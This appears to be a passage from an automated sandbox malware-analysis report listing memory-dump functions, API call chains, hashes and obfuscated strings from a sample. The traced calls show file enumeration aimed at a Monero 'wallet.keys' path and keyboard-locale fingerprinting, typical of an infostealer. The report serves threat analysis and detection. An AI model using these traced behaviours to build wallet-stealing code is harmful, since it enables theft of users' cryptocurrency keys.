                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 5d1912e8b03b963a57162ae954215733f7df48496f300a3215cce8467f45e8f1
                              • Instruction ID: 73d127a9d42eb22324a05927efd7bf7b7312e1289147229352b39180291fd00a
                              • Opcode Fuzzy Hash: 5d1912e8b03b963a57162ae954215733f7df48496f300a3215cce8467f45e8f1
                              • Instruction Fuzzy Hash: D012CE7195011CABDB16EB60DCA6FEE7378AF74305F80419DA50A62191EF30AF89CF91
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001D0C2E), ref: 001BDE5E
                              • StrCmpCA.SHLWAPI(?,001D14C8), ref: 001BDEAE
                              • StrCmpCA.SHLWAPI(?,001D14CC), ref: 001BDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BE3E0
                              • FindClose.KERNEL32(000000FF), ref: 001BE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 51d52ea6c86000893956d2f98b1917ce64609a0ce792947b6f7373bf82df7d70
                              • Instruction ID: 98b36ef440e06bd8fff0cfd8f982ae8a8941fd8134f3563a0af5118a40bf8d6e
                              • Opcode Fuzzy Hash: 51d52ea6c86000893956d2f98b1917ce64609a0ce792947b6f7373bf82df7d70
                              • Instruction Fuzzy Hash: F6F1697195411C9BDB26EB60DC96FEE7378AF74305FC0419EA40A62091EF30AB4ACF56
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001D14B0,001D0C2A), ref: 001BDAEB
                              • StrCmpCA.SHLWAPI(?,001D14B4), ref: 001BDB33
                              • StrCmpCA.SHLWAPI(?,001D14B8), ref: 001BDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BDDCC
                              • FindClose.KERNEL32(000000FF), ref: 001BDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 0a0fae13375446e3ca4cd1547a3e2bea7224080bc085f39dbccb8fcba7e4a3a2
                              • Instruction ID: bbf7203429b433a61fc5eb09905b2ab8f3638916d54a4234fd3e1049d5cb097e
                              • Opcode Fuzzy Hash: 0a0fae13375446e3ca4cd1547a3e2bea7224080bc085f39dbccb8fcba7e4a3a2
                              • Instruction Fuzzy Hash: C6910372900208A7CB15FBB0ED56EED777DAFA4304F80855CE90A96181EF35DB19CB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: +oSu$1rsF$<{x_$A6?7$D<qk$TZ,C$rZT8$~5y~$}v
                              • API String ID: 0-2430177226
                              • Opcode ID: 43ea3571ec6be97b8b1fcfcfd04bcdd33d12903e1705cf2420e5e2b93848a46e
                              • Instruction ID: 1b751b870aca7e6a4a446e9ef00c0ecfe6b5a8d1c62e5b74a8fd2891a1002041
                              • Opcode Fuzzy Hash: 43ea3571ec6be97b8b1fcfcfd04bcdd33d12903e1705cf2420e5e2b93848a46e
                              • Instruction Fuzzy Hash: F87224F3A08200AFD3046E29EC8567AFBE5EFD4720F1A893DE6C587744EA3558058797
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,001D05AF), ref: 001C7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001C7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 001C7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 001C7C62
                              • LocalFree.KERNEL32(00000000), ref: 001C7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 6536340e0dc76fc4e020ae0d3aeb5d9aaa22ed4c20b5fcddd42abd62fbbcec0d
                              • Instruction ID: cbded19b7ee6ff832c5bd20cab857a94b93d5350f9f88471432ae1934397ee71
                              • Opcode Fuzzy Hash: 6536340e0dc76fc4e020ae0d3aeb5d9aaa22ed4c20b5fcddd42abd62fbbcec0d
                              • Instruction Fuzzy Hash: BA416D7194021CABCB25DB94DC99FEEB378FF64704F604199E40A62280DB74AF85CFA1
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001D0D73), ref: 001BE4A2
                              • StrCmpCA.SHLWAPI(?,001D14F8), ref: 001BE4F2
                              • StrCmpCA.SHLWAPI(?,001D14FC), ref: 001BE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 575b8e90be598b6252d2c536ba42750db2fbef9dd36b51e1a96f1daad9fda3d2
                              • Instruction ID: 3d9718465b08323226e79d2871f77be04c85e42022c5b7dd042d89e6016ba771
                              • Opcode Fuzzy Hash: 575b8e90be598b6252d2c536ba42750db2fbef9dd36b51e1a96f1daad9fda3d2
                              • Instruction Fuzzy Hash: 06121D7191011CABDB16FB60DCA6FED7378AF74304F8041ADA50A96191EF34AF49CB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &X/p$.o$1o{$Fs}$HS_X$fS}
                              • API String ID: 0-4075491589
                              • Opcode ID: c04104917282296cf35df845905893d257e070242cc869497933a0cfd44856cf
                              • Instruction ID: 7e3e80f31f3f9b4a7b4348c8423758b11d57e8ab4cfdae86bde37640dc250001
                              • Opcode Fuzzy Hash: c04104917282296cf35df845905893d257e070242cc869497933a0cfd44856cf
                              • Instruction Fuzzy Hash: 53B2F7F3A0C204AFE3046E29EC8567ABBE9EF94720F16493DE6C4D3744E63598058797
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ""k$6'w$Ao9$C,o+$U)7\$dAzw
                              • API String ID: 0-3349261393
                              • Opcode ID: 997fb2eb7c60b0d929ef784617f5c82b4d9d6d801e2c7b77037e6e3561114706
                              • Instruction ID: 061d40d71bb5eb5b50050b5d6ef8fc6661d776a83d415ab0e165ba3902eb76cc
                              • Opcode Fuzzy Hash: 997fb2eb7c60b0d929ef784617f5c82b4d9d6d801e2c7b77037e6e3561114706
                              • Instruction Fuzzy Hash: BBB219F360C204AFE704AE2DEC4567BBBE6EBD4720F168A3DE6C483744EA3558058657
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: @>?$JgK$a(_$g9?Z$qgO
                              • API String ID: 0-161722662
                              • Opcode ID: e8769f8c1d2cc9718eb4c3bd0d3f5d27f25a1ba79938dad9f3ed0e2d35a945d9
                              • Instruction ID: 75b30384818c107f2b9ada0a91e1150da0d6de0589251d9d57d4ba045715928d
                              • Opcode Fuzzy Hash: e8769f8c1d2cc9718eb4c3bd0d3f5d27f25a1ba79938dad9f3ed0e2d35a945d9
                              • Instruction Fuzzy Hash: 1EB238F3A0C2149FE3046E2DEC8567ABBE9EF94720F1A453DEAC4C7344E63598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $7EL$< }$J{MM$`6=$eo;
                              • API String ID: 0-485998035
                              • Opcode ID: 3572b2f4718245b5d7b8bfcce7e110ce983f98aaf4148377aa0e3778285b544f
                              • Instruction ID: 4f6f7e505ae25b916407e18a4f2e763de080f8ca6b40b16714289b67825181e6
                              • Opcode Fuzzy Hash: 3572b2f4718245b5d7b8bfcce7e110ce983f98aaf4148377aa0e3778285b544f
                              • Instruction Fuzzy Hash: ACB229F360C2049FE3086E2DEC85A7ABBE9EF94320F1A453DE6C5C7744EA3558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0rf]$R35o$_7=$vIYA${?
                              • API String ID: 0-1634464998
                              • Opcode ID: 5d40d7d2bc2f66789b6dc5c4bf2e95f3a1c7212ba0475ec212699e546adf0157
                              • Instruction ID: 3045f3611cb71d92c027b20d7c53d75b5b60be9b52217090b022dc93697b42ff
                              • Opcode Fuzzy Hash: 5d40d7d2bc2f66789b6dc5c4bf2e95f3a1c7212ba0475ec212699e546adf0157
                              • Instruction Fuzzy Hash: 10B21AF360C2049FE304AE3DEC8567ABBE5EF94720F16893DEAC4C7744EA3558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: |?$?Pon$IJs$fj=_$4{[
                              • API String ID: 0-1885599475
                              • Opcode ID: ea09586ce0861abbfdacc98e87a048b033393d6e7f13b8439108f00b7f90efb5
                              • Instruction ID: dffdbf72b80790c076118b8f05e29c21bbdf9009d7039080055e1375b5068b99
                              • Opcode Fuzzy Hash: ea09586ce0861abbfdacc98e87a048b033393d6e7f13b8439108f00b7f90efb5
                              • Instruction Fuzzy Hash: A3B2D4F3A0C2049FE314AE29EC8567AFBE9EF94720F16493DE6C4C3740E67598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
